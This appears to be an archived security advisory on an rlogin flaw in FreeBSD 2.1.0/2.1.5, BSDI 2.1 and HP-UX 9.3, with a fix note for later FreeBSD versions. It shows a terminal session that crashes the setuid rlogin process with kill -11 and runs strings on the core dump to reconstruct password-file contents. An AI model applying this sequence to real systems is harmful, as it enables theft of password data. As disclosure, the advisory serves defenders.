COMMAND rlogin SYSTEMS AFFECTED FreeBSD 2.1.0, 2.1.5, BSDI 2.1, HPUX v9.3 Series 700 PROBLEM Roelof W. Temmingh was able to reconstruct parts of un-shadowed password file on (at least) FreeBSD 2.1.0 and 2.1.5. Take a look at following: ~> rlogin 127.0.0.1 Password: Last login: Mon Feb 17 00:35:49 from localhost Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996 You have new mail. ~> ps -ax | grep rlogin 6528 ?? S 0:00.06 rlogind 6527 p1 S+ 0:00.05 rlogin 127.0.0.1 6529 p1 S+ 0:00.01 rlogin 127.0.0.1 ~> kill -11 6529 ~> ls Brain_Box NS cronjobs mail security Mail News foon rlogin.core ~>strings rlogin.core > unshadowed.passwdfile.reconstruct ~>vi unshadowed.passwdfile.reconstruct and reconstruct.. SOLUTION FreeBSD 2.1.6 and later versions will not dump a core file if the process is setuid/setgid.